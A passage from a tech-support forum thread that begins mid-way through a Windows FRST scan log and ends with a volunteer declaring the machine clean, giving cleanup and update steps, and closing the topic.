2014-08-06 03:00 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-06 03:00 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-06 03:00 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-06 03:00 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-06 03:00 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-08-06 03:00 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-06 03:00 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-08-06 03:00 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-06 03:00 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-06 03:00 - 2014-06-05 07:45 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-08-06 03:00 - 2014-06-05 07:26 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-08-06 03:00 - 2014-06-05 07:25 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-08-06 03:00 - 2014-04-11 19:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-08-06 03:00 - 2014-04-11 19:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-08-06 03:00 - 2014-04-11 19:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 15:20 - 2014-08-28 14:19 - 00014924 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 15:20 - 2014-08-28 14:18 - 00000000 ____D () C:\FRST
2014-08-28 15:18 - 2014-08-28 15:18 - 00038660 _____ () C:\Users\mike\Desktop\HitmanPro_20140828_1518.log
2014-08-28 15:18 - 2014-08-28 15:10 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-28 15:11 - 2014-08-28 15:11 - 11193392 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro_x64.exe
2014-08-28 15:09 - 2014-08-28 15:08 - 10279800 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro.exe
2014-08-28 15:01 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-28 15:01 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-28 14:57 - 2014-08-28 14:57 - 00023791 _____ () C:\ComboFix.txt
2014-08-28 14:57 - 2014-08-28 14:35 - 00000000 ____D () C:\Qoobox
2014-08-28 14:57 - 2009-07-13 20:20 - 00000000 __RHD () C:\Users\Default
2014-08-28 14:56 - 2014-08-28 14:35 - 00000000 ____D () C:\Windows\erdnt
2014-08-28 14:54 - 2014-02-21 13:38 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Spotify
2014-08-28 14:53 - 2013-04-12 14:32 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-08-28 14:53 - 2010-11-20 20:47 - 00253526 _____ () C:\Windows\PFRO.log
2014-08-28 14:53 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-28 14:53 - 2009-07-13 21:51 - 00039462 _____ () C:\Windows\setupact.log
2014-08-28 14:53 - 2009-07-13 19:34 - 00000215 _____ () C:\Windows\system.ini
2014-08-28 14:52 - 2013-02-11 20:05 - 01480998 _____ () C:\Windows\WindowsUpdate.log
2014-08-28 14:52 - 2009-07-13 19:34 - 73138176 _____ () C:\Windows\system32\config\SOFTWARE.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 28573696 _____ () C:\Windows\system32\config\COMPONENTS.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 17825792 _____ () C:\Windows\system32\config\SYSTEM.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00786432 _____ () C:\Windows\system32\config\DEFAULT.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak
2014-08-28 14:48 - 2013-04-29 10:25 - 00000000 ____D () C:\Users\mike
2014-08-28 14:48 - 2013-04-12 14:36 - 00000000 ____D () C:\Users\networkadmin
2014-08-28 14:34 - 2014-08-28 14:33 - 05574834 ____R (Swearware) C:\Users\mike\Desktop\ComboFix.exe
2014-08-28 14:20 - 2014-08-28 14:19 - 00039005 _____ () C:\Users\mike\Desktop\Addition.txt
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 14:01 - 2014-08-28 13:58 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 14:00 - 2014-08-28 13:58 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:53 - 2014-01-09 12:48 - 00000636 _____ () C:\Windows\Tasks\TSOLnkUpdAlertTask.job
2014-08-28 13:51 - 2014-08-27 14:54 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-28 13:51 - 2013-04-29 10:25 - 00000856 __RSH () C:\Users\mike\ntuser.pol
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 12:33 - 2013-04-12 16:22 - 00000000 ____D () C:\Quote
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-28 07:06 - 2014-02-21 13:39 - 00000000 ____D () C:\Users\mike\AppData\Local\Spotify
2014-08-27 19:57 - 2013-08-20 12:08 - 00000000 ____D () C:\Users\mike\AppData\Local\ESET
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:09 - 2014-08-27 15:04 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:55 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:36 - 2009-07-13 22:13 - 00786558 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-27 14:27 - 2014-08-27 14:51 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:29 - 2014-08-27 13:21 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:20 - 2014-08-27 13:03 - 00000000 ____D () C:\temp
2014-08-27 13:07 - 2014-08-27 13:06 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:06 - 2013-02-11 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:03 - 2013-08-22 10:52 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Deployment
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:00 - 2013-02-11 20:07 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-08-27 13:00 - 2013-02-11 20:07 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-27 12:07 - 2014-08-27 11:50 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:27 - 2013-06-24 16:07 - 539952258 _____ () C:\Windows\MEMORY.DMP
2014-08-27 11:27 - 2013-06-24 16:07 - 00000000 ____D () C:\Windows\Minidump
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-27 11:03 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:37 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-02-11 20:23 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:34 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:33 - 2014-08-21 09:32 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:33 - 2009-07-13 21:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-15 13:20 - 2013-04-12 16:21 - 00000000 ____D () C:\Users\Public\QpipeWrk
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-13 06:56 - 2013-04-29 10:35 - 00011261 _____ () C:\Users\mike\Desktop\TIME SHEET Estimators.xlsx
2014-08-06 03:48 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-08-06 03:11 - 2009-07-13 21:45 - 00347632 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-06 03:09 - 2010-11-21 00:17 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-06 03:09 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-08-06 03:03 - 2013-04-12 15:03 - 00000000 ____D () C:\ProgramData\Microsoft Help

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-27 00:18

==================== End Of Log ============================



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 05:31 PM

Great!

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Internet Explorer Version 9




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#11 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 05:45 PM

Aharonov,

Many thanks for your assistance! All is working well. Nice trick with that rename and uninstall! Like the delfix program, doesn't rely on me to remember to delete old restore points, etc. Will update IE and check out the link.

Enjoy the beer!



#12 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 06:10 PM

Thank you very much for the beer and take care!

#13 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 06:10 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users